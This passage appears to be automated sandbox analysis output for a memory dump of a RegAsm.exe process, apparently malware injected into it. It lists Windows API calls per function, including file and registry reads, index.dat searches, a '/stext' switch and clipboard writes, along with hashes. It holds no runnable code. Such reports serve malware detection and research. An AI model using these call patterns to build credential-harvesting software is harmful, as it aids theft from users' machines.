                              • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                            • GetLastError.KERNEL32 ref: 00417627
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorLast$File$PointerRead
                            • String ID:
                            • API String ID: 839530781-0
                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FileFindFirst
                            • String ID: *.*$index.dat
                            • API String ID: 1974802433-2863569691
                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@mallocmemcpy
                            • String ID:
                            • API String ID: 3831604043-0
                            • Opcode ID: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                            • Opcode Fuzzy Hash: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                            APIs
                            • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                            • GetLastError.KERNEL32 ref: 004175A2
                            • GetLastError.KERNEL32 ref: 004175A8
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorLast$FilePointer
                            • String ID:
                            • API String ID: 1156039329-0
                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                            • CloseHandle.KERNEL32(00000000), ref: 0040A061
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleTime
                            • String ID:
                            • API String ID: 3397143404-0
                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                            APIs
                            • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                            • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Temp$DirectoryFileNamePathWindows
                            • String ID:
                            • API String ID: 1125800050-0
                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CloseHandleSleep
                            • String ID: }A
                            • API String ID: 252777609-2138825249
                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset
                            • String ID: BINARY
                            • API String ID: 2221118986-907554435
                            • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                            • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                            APIs
                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                            • _mbscpy.MSVCRT ref: 00405250
                            • _mbscat.MSVCRT ref: 0040525B
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                            • String ID:
                            • API String ID: 568699880-0
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _wcsicmp
                            • String ID: /stext
                            • API String ID: 2081463915-3817206916
                            APIs
                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                            • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                            • CloseHandle.KERNEL32(00000000), ref: 0040957A
                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$??2@CloseCreateHandleReadSize
                            • String ID:
                            • API String ID: 1023896661-0
                            APIs
                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                            • CloseHandle.KERNEL32(?), ref: 0040CC98
                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                            • String ID:
                            • API String ID: 2445788494-0
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcmpmemset
                            • String ID:
                            • API String ID: 1065087418-0
                            APIs
                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                            • CloseHandle.KERNEL32(?), ref: 00410654
                              • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                            • String ID:
                            • API String ID: 1381354015-0
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            APIs
                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                              • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                              • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$Time$CloseCompareCreateHandlememset
                            • String ID:
                            • API String ID: 2154303073-0
                            APIs
                            • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$PointerRead
                            • String ID:
                            • API String ID: 3154509469-0
                            APIs
                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: PrivateProfile$StringWrite_itowmemset
                            • String ID:
                            • API String ID: 4232544981-0
                            APIs
                            • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            APIs
                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FileModuleName
                            • String ID:
                            • API String ID: 514040917-0
                            APIs
                            • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            APIs
                            • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            APIs
                            • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@
                            • String ID:
                            • API String ID: 613200358-0
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            APIs
                            • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@
                            • String ID:
                            • API String ID: 613200358-0
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@
                            • String ID:
                            • API String ID: 613200358-0
                            APIs
                            • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            APIs
                            • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: EnumNamesResource
                            • String ID:
                            • API String ID: 3334572018-0
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            APIs
                            • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CloseFind
                            • String ID:
                            • API String ID: 1863332320-0
                            APIs
                            • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Open
                            • String ID:
                            • API String ID: 71445658-0
                            APIs
                            • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            APIs
                            • memset.MSVCRT ref: 004095FC
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                              • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                              • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                            • String ID:
                            • API String ID: 3655998216-0
                            APIs
                            • memset.MSVCRT ref: 00445426
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                              • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                            • String ID:
                            • API String ID: 1828521557-0
                            APIs
                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                              • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                            • memcpy.MSVCRT ref: 00406942
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??2@FilePointermemcpy
                            • String ID:
                            • API String ID: 609303285-0
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _wcsicmp
                            • String ID:
                            • API String ID: 2081463915-0
                            APIs
                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$CloseCreateErrorHandleLastRead
                            • String ID:
                            • API String ID: 2136311172-0
                            APIs
                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                            • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??2@??3@
                            • String ID:
                            • API String ID: 1936579350-0
                            APIs
                            • EmptyClipboard.USER32 ref: 004098EC
                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                            • GlobalFix.KERNEL32(00000000), ref: 00409927
                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                            • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                            • GetLastError.KERNEL32 ref: 0040995D
                            • CloseHandle.KERNEL32(?), ref: 00409969
                            • GetLastError.KERNEL32 ref: 00409974
                            • CloseClipboard.USER32 ref: 0040997D
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                            • String ID:
                            • API String ID: 2565263379-0
                            APIs
                            • EmptyClipboard.USER32 ref: 00409882
                            • wcslen.MSVCRT ref: 0040988F
                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                            • GlobalFix.KERNEL32(00000000), ref: 004098AC
                            • memcpy.MSVCRT ref: 004098B5
                            • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                            • CloseClipboard.USER32 ref: 004098D7
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
